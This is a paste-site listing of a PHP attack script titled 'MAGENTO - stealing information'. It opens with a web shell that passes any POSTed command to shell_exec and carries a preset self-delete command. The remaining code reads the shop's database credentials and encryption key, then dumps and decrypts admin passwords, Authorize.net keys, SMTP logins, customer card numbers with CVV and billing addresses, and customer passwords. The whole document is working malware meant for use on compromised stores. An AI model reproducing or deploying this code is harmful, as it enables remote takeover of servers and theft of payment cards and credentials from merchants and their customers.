SHOW:
|
|
- or go back to the newest paste.
1 | <center> | |
2 | <form method="post"> | |
3 | <input type="hidden" name="cmd" value="rm qq.php"> | |
4 | <input type="submit" value="Delete"> | |
5 | </form> | |
6 | <?php | |
7 | $fw = "fwrite"; | |
8 | $ada = "function_exists"; | |
9 | $crot = "shell_exec"; | |
10 | if (isset($_POST['cmd'])) { | |
11 | $fw($mulai, $buat); | |
12 | if ($ada('shell_exec')) { | |
13 | $lihat = $_POST['cmd']; | |
14 | $hasil = $crot("$lihat"); | |
15 | echo "<pre>$hasil</pre>"; | |
16 | } | |
17 | } | |
18 | ?> | |
19 | <?php | |
20 | /* | |
21 | coder : sohai | |
22 | */ | |
23 | ||
24 | @set_time_limit(0); | |
25 | ||
26 | echo'<head> | |
27 | <title>MAGENTO - stealing information</title> | |
28 | </head> | |
29 | <div id="page-wrap"> | |
30 | <body> | |
31 | <style type="text/css"> | |
32 | body,table { font-family:verdana;font-size:9px;color:#CCCCCC;background-color:#333333; } | |
33 | table { width:100%; border-color:#333333;border-width:0pt 1pt; border-style:solid; } | |
34 | td {background-color: #000500; font-family: Courier New; font-size:8pt; color:#999999; border-color:#FFFFFF; border-width:1pt 0pt; border-style:solid; border-collapse:collapse;padding:0pt 3pt;vertical-align:middle;} | |
35 | A:Link, A:Visited { color: #999999; text-decoration: none; } | |
36 | A.no:Link, A.no:Visited { text-decoration: none; } | |
37 | A:Hover, A:Visited:Hover , A.no:Hover, A.no:Visited:Hover { color: #666666; background-color:#333333; text-decoration: none; } | |
38 | input,select,option { font:8pt tahoma;color:#666666;margin:2;border:1px solid #666666; } | |
39 | textarea { color:#666666;font:verdana bold;border:1px solid ;margin:2; } | |
40 | .fleft { float:left;text-align:left; } | |
41 | .fright { float:right;text-align:right; } | |
42 | #pagebar { font:8pt tahoma;padding:5px; border:3px solid #333333; border-collapse:collapse; } | |
43 | #pagebar td { vertical-align:top; } | |
44 | #pagebar p { font:8pt tahoma;} | |
45 | #pagebar a { font-weight:bold;color:#666666; } | |
46 | #pagebar a:visited { color:#00CE00; } | |
47 | #mainmenu { text-align:center; } | |
48 | #mainmenu a { text-align: center;padding: 0px 5px 0px 5px; } | |
49 | #maininfo,.barheader,.barheader2 { text-align:center; } | |
50 | #maininfo td { padding:3px; } | |
51 | .barheader { font-weight:bold;padding:5px; } | |
52 | .barheader2 { padding:5px;border:2px solid #333333; } | |
53 | .contents,.explorer { border-collapse:collapse;} | |
54 | .contents td { vertical-align:top; } | |
55 | .mainpanel { border-collapse:collapse;padding:5px; } | |
56 | .barheader,.mainpanel table,td { border:1px solid #333333; } | |
57 | .mainpanel input,select,option { border:1px solid #333333;margin:0; } | |
58 | input[type="submit"] { border:1px solid #333333; } | |
59 | input[type="text"] { padding:3px;} | |
60 | .fxerrmsg { color:red; font-weight:bold; } | |
61 | #pagebar,#pagebar p,h1,h2,h3,h4,form { margin:0; } | |
62 | #pagebar,.mainpanel,input[type="submit"] { background-color:black; } | |
63 | .barheader2,input,select,option,input[type="submit"]:hover { background-color:black; } | |
64 | textarea,.mainpanel input,select,option { background-color:#000000; } | |
65 | // --> | |
66 | </style> | |
67 | ||
68 | <body bgcolor="#ffffff" > | |
69 | ||
70 | <center> | |
71 | <br> | |
72 | <FORM action="" method="post"> | |
73 | <div align="center">[M A G E N T O] - Stealing Information<br> | |
74 | <div align="center">coder: sohai & n4KuLa_<br> | |
75 | <input type="hidden" name="form_action" value="2"> | |
76 | </div> | |
77 | </div> | |
78 | '; | |
79 | ||
80 | ||
81 | if(file_exists($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml')){ | |
82 | $xml = simplexml_load_file($_SERVER['DOCUMENT_ROOT'].'/app/etc/local.xml'); | |
83 | if(isset($xml->global->resources->default_setup->connection)) { | |
84 | $connection = $xml->global->resources->default_setup->connection; | |
85 | $prefix = $xml->global->resources->db->table_prefix; | |
86 | $key = $xml->global->crypt->key; //f8cd1881e3bf20108d5f4947e60acfc1 | |
87 | require_once $_SERVER['DOCUMENT_ROOT'].'/app/Mage.php'; | |
88 | ||
89 | try { | |
90 | $app = Mage::app('default'); | |
91 | Mage::getSingleton('core/session', array('name'=>'frontend')); | |
92 | }catch(Exception $e) { echo 'Message: ' .$e->getMessage()."<br/>\n";} | |
93 | ||
94 | if (!mysql_connect($connection->host, $connection->username, $connection->password)){ | |
95 | print("Could not connect: " . mysql_error()); | |
96 | } | |
97 | mysql_select_db($connection->dbname); | |
98 | echo $connection->host."|".$connection->username."|".$connection->password."|".$connection->dbname."| $prefix | $key<br/>\n"; | |
99 | ||
100 | $crypto = new Varien_Crypt_Mcrypt(); | |
101 | $crypto->init($key); | |
102 | ||
103 | //========================================================================================================= | |
104 | $query = mysql_query("SELECT user_id,firstname,lastname,email,username,password FROM admin_user where is_active = '1'"); | |
105 | if (!$query){ | |
106 | echo "<center><b>Gagal</b></center>"; | |
107 | }else{ | |
108 | $site = mysql_fetch_array(mysql_query("SELECT value as website FROM core_config_data WHERE path='web/unsecure/base_url'")); | |
109 | echo'<br><br> | |
110 | ====================================================================<br> | |
111 | [ Admin FROM website : '.$site['website'].'] <br> | |
112 | ====================================================================<br>'; | |
113 | } | |
114 | echo " | |
115 | <table border='1' align='center' > | |
116 | <tr> | |
117 | <td>id</td> | |
118 | <td>firstname</td> | |
119 | <td>lastname</td> | |
120 | <td>email</td> | |
121 | <td>username</td> | |
122 | <td>password</td> | |
123 | </tr>"; | |
124 | while($vx = mysql_fetch_array($query)) { | |
125 | $no = 1; | |
126 | $user_id = $vx['user_id']; | |
127 | $username = $vx['username']; | |
128 | $password = $vx['password']; | |
129 | $email = $vx['email']; | |
130 | $firstname = $vx['firstname']; | |
131 | $lastname = $vx['lastname']; | |
132 | echo "<tr><pre><td>$user_id</td><td>$firstname</td><td>$lastname</td><td>$email</td><td>$username</td><td>$password</td></pre></tr>"; | |
133 | } | |
134 | echo "</table><br>"; | |
135 | //========================================================================================================= | |
136 | $query = mysql_query("SELECT value as user,(SELECT value FROM core_config_data where path = 'payment/authorizenet/trans_key') as pass FROM core_config_data where path = 'payment/authorizenet/login'"); | |
137 | if(mysql_num_rows($query) != 0){ | |
138 | if (!$query){ | |
139 | echo "<center><b>Gagal</b></center>"; | |
140 | }else{ | |
141 | echo'<br><br> | |
142 | ====================================================================<br> | |
143 | [ Authorizenet ] <br> | |
144 | ====================================================================<br>'; | |
145 | } | |
146 | echo " | |
147 | <table border='1' align='center' > | |
148 | <tr> | |
149 | <td>user</td> | |
150 | <td>pass</td> | |
151 | </tr>"; | |
152 | $no = 1; | |
153 | while($vx = mysql_fetch_array($query)) { | |
154 | $user = $crypto->decrypt($vx['user']); | |
155 | $pass = $crypto->decrypt($vx['pass']); | |
156 | ||
157 | ||
158 | echo "<tr><pre><td>$no</td><td>$user</td><td>$pass</td></pre></tr>"; | |
159 | $no++; | |
160 | } | |
161 | echo "</table><br>"; | |
162 | } | |
163 | //========================================================================================================= | |
164 | $query_smtp = mysql_query("SELECT (SELECT a.value FROM core_config_data as a WHERE path = 'system/smtpsettings/host') as host , (SELECT b.value FROM core_config_data as b WHERE path = 'system/smtpsettings/port') as port,(SELECT c.value FROM core_config_data as c WHERE path = 'system/smtpsettings/username') as user ,(SELECT d.value FROM core_config_data as d WHERE path = 'system/smtpsettings/password') as pass FROM core_config_data limit 1,1"); | |
165 | if(mysql_num_rows($query_smtp) != 0){ | |
166 | if (!$query_smtp){ | |
167 | echo "<center><b>Gagal</b></center>"; | |
168 | }else{ | |
169 | echo'<br><br> | |
170 | ====================================================================<br> | |
171 | [ SMTP ] <br> | |
172 | ====================================================================<br>'; | |
173 | } | |
174 | echo " | |
175 | <table border='1' align='center' > | |
176 | <tr> | |
177 | <td>no</td> | |
178 | <td>host</td> | |
179 | <td>port</td> | |
180 | <td>user</td> | |
181 | <td>pass</td> | |
182 | </tr>"; | |
183 | $no = 1; | |
184 | $batas = 0; | |
185 | while($rows = mysql_fetch_array($query_smtp)) { | |
186 | $smtphost = $rows[0]; | |
187 | $smtpport = $rows[1]; | |
188 | $smtpuser = $rows[2]; | |
189 | $smtppass = $rows[3]; | |
190 | echo "<tr><pre><td>$no</td><td>$smtphost</td><td>$smtpport</td><td>$smtpuser</td><td>$smtppass</td></pre></tr>"; | |
191 | $no++; | |
192 | } | |
193 | echo "</table><br>"; | |
194 | } | |
195 | //========================================================================================================= | |
196 | $query = mysql_query("SELECT sfo.updated_at,sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_enc,CONCAT(sfo.cc_exp_month,' |',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' |-| ',billing.email) AS 'Billing Address' FROM sales_flat_quote_payment AS sfo JOIN sales_flat_quote_address AS billing ON billing.quote_id = sfo.quote_id AND billing.address_type = 'billing'"); | |
197 | $query2 = mysql_query("SELECT sfo.cc_owner,sfo.method,sfo.cc_number_enc,sfo.cc_cid_status,CONCAT(sfo.cc_exp_month,'|',sfo.cc_exp_year) as exp,CONCAT(billing.firstname,' | ',billing.lastname,' | ',billing.street,' | ',billing.city,' | ', billing.region,' | ',billing.postcode,' | ',billing.country_id,' | ',billing.telephone,' | ',billing.email) AS 'Billing Address' FROM sales_flat_order_payment AS sfo JOIN sales_flat_order_address AS billing ON billing.parent_id = sfo.parent_id AND billing.address_type = 'billing' where cc_number_enc != ''"); | |
198 | if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0){ | |
199 | echo'<br><br> | |
200 | ====================================================================<br> | |
201 | [ 16 Digit ] <br> | |
202 | ====================================================================<br>'; | |
203 | echo " | |
204 | <table border='1' align='left' > | |
205 | <tr> | |
206 | <td>no</td> | |
207 | <td>Date</td> | |
208 | <td>Credit Owner</td> | |
209 | <td>method</td> | |
210 | <td>Credit Number</td> | |
211 | <td>Credit Exp</td> | |
212 | <td>CVV</td> | |
213 | <td>Address</td> | |
214 | </tr>"; | |
215 | $no = 1; | |
216 | $batas = 0; | |
217 | while($vx = mysql_fetch_array($query)){ | |
218 | $date = $vx['updated_at']; | |
219 | $cc_owner = $vx['cc_owner']; | |
220 | $method = $vx['method']; | |
221 | $cc_number_enc = $crypto->decrypt($vx['cc_number_enc']); | |
222 | $exp = $vx['exp']; | |
223 | $cc_cid_enc = $crypto->decrypt($vx['cc_cid_enc']); | |
224 | $Billing_Address = $vx['Billing Address']; | |
225 | echo "<tr><pre><td>$no</td><td>$date</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_enc</td><td>$Billing_Address</td></pre></tr>"; | |
226 | $batas = $no++; | |
227 | } | |
228 | ||
229 | while($vx2 = mysql_fetch_array($query2)){ | |
230 | $batas +=1; | |
231 | $cc_owner = $vx2['cc_owner']; | |
232 | $method = $vx2['method']; | |
233 | $cc_number_enc = $crypto->decrypt($vx2['cc_number_enc']); | |
234 | $exp = $vx2['exp']; | |
235 | $cc_cid_status = $crypto->decrypt($vx2['cc_cid_status']); | |
236 | $Billing_Address = $vx2['Billing Address']; | |
237 | echo "<tr><pre><td>$batas</td><td>$cc_owner</td><td>$method</td><td>$cc_number_enc</td><td>$exp</td><td>$cc_cid_status</td><td>$Billing_Address</td></pre></tr>"; | |
238 | $batas++; | |
239 | } | |
240 | ||
241 | echo "</table><br>"; | |
242 | } | |
243 | //========================================================================================================= | |
244 | $query = mysql_query("SELECT email,value FROM customer_entity_varchar, customer_entity WHERE customer_entity_varchar.entity_id = customer_entity.entity_id and attribute_id=12"); | |
245 | $query2 = mysql_query("SELECT customer_email,password_hash FROM sales_flat_quote"); | |
246 | ||
247 | ||
248 | if(mysql_num_rows($query) != 0 || mysql_num_rows($query2) != 0 ){ | |
249 | if (!$query){ | |
250 | echo "<center><b>Gagal</b></center>"; | |
251 | }else{ | |
252 | echo'<br><br> | |
253 | ====================================================================<br> | |
254 | [ PayPal User + Pass ] <br> | |
255 | ====================================================================<br>'; | |
256 | } | |
257 | echo " | |
258 | <table border='1' align='center' > | |
259 | <center> | |
260 | <tr> | |
261 | <td>no</td> | |
262 | <td>user</td> | |
263 | <td>pass</td> | |
264 | </tr>"; | |
265 | $no = 1; | |
266 | $batas = 0; | |
267 | while($vx = mysql_fetch_array($query)) { | |
268 | $user = $vx['email']; | |
269 | $pass = $vx['value']; | |
270 | echo "<tr><pre><td>$user|$pass</td></pre></tr>"; | |
271 | $batas = $no++; | |
272 | } | |
273 | ||
274 | if(mysql_num_rows($query2) != 0 && ($query2)){ | |
275 | while($vx2 = mysql_fetch_array($query2)){ | |
276 | $user = $vx2['customer_email']; | |
277 | $pass = $crypto->decrypt($vx2['password_hash']); | |
278 | if(!empty($user) && !empty($pass)){ //tampilin ketika datanya itu ada klo gk ada ya jangan di tampiin | |
279 | $batas +=1; | |
280 | echo "<tr><pre><td>$user|$pass</td></pre></tr>"; | |
281 | $batas++; | |
282 | } | |
283 | } | |
284 | } | |
285 | ||
286 | echo "</table><br>"; | |
287 | } | |
288 | //========================================================================================================= | |
289 | } | |
290 | } | |
291 | function save($format,$data){ | |
292 | $fp = fopen($format, 'a'); | |
293 | fwrite($fp, $data); | |
294 | fclose($fp); | |
295 | } | |
296 | function cekbase64($string){ | |
297 | $decoded = base64_decode($string, true); | |
298 | if (!preg_match('/^[a-zA-Z0-9\/\r\n+]*={0,2}$/', $string)) return false; | |
299 | if(!base64_decode($string, true)) return false; | |
300 | if(base64_encode($decoded) != $string) return false; | |
301 | return true;//nilai return 1 jika true | |
302 | } | |
303 | //----untuk decode password ---/ | |
304 | class Varien_Crypt_Mcrypt{ | |
305 | /** | |
306 | * Constuctor | |
307 | * | |
308 | * @param array $data | |
309 | */ | |
310 | public function __construct() | |
311 | { | |
312 | } | |
313 | ||
314 | /** | |
315 | * Initialize mcrypt module | |
316 | * | |
317 | * @param string $key cipher private key | |
318 | * @return Varien_Crypt_Mcrypt | |
319 | */ | |
320 | public function init($key) | |
321 | { | |
322 | $this->handler = mcrypt_module_open(MCRYPT_BLOWFISH, '', MCRYPT_MODE_ECB, ''); | |
323 | $iv = mcrypt_create_iv (mcrypt_enc_get_iv_size($this->handler), MCRYPT_RAND); | |
324 | $maxKeySize = mcrypt_enc_get_key_size($this->handler); | |
325 | ||
326 | if (iconv_strlen($key, 'UTF-8')>$maxKeySize) { | |
327 | //throw new Varien_Exception('Maximum key size must should be smaller '.$maxKeySize); | |
328 | return null; | |
329 | } | |
330 | ||
331 | mcrypt_generic_init($this->handler, $key, $iv); | |
332 | ||
333 | return $this; | |
334 | } | |
335 | ||
336 | /** | |
337 | * Encrypt data | |
338 | * | |
339 | * @param string $data source string | |
340 | * @return string | |
341 | */ | |
342 | public function encrypt($data) | |
343 | { | |
344 | if (!$this->handler) { | |
345 | //throw new Varien_Exception('Crypt module is not initialized.'); | |
346 | return null; | |
347 | } | |
348 | if (strlen($data) == 0) { | |
349 | return $data; | |
350 | } | |
351 | return base64_encode(mcrypt_generic($this->handler, $data)); | |
352 | } | |
353 | ||
354 | /** | |
355 | * Decrypt data | |
356 | * | |
357 | * @param string $data encrypted string | |
358 | * @return string | |
359 | */ | |
360 | public function decrypt($data) | |
361 | { | |
362 | if (!$this->handler) { | |
363 | //throw new Varien_Exception('Crypt module is not initialized.'); | |
364 | return null; | |
365 | } | |
366 | if (strlen($data) == 0) { | |
367 | return $data; | |
368 | } | |
369 | return mdecrypt_generic($this->handler, base64_decode($data)); | |
370 | } | |
371 | ||
372 | ||
373 | /** | |
374 | * Desctruct cipher module | |
375 | * | |
376 | */ | |
377 | public function __destruct() | |
378 | { | |
379 | if ($this->handler) { | |
380 | $this->_reset(); | |
381 | } | |
382 | } | |
383 | ||
384 | protected function _reset() | |
385 | { | |
386 | mcrypt_generic_deinit($this->handler); | |
387 | mcrypt_module_close($this->handler); | |
388 | } | |
389 | } | |
390 | ||
391 | ?> |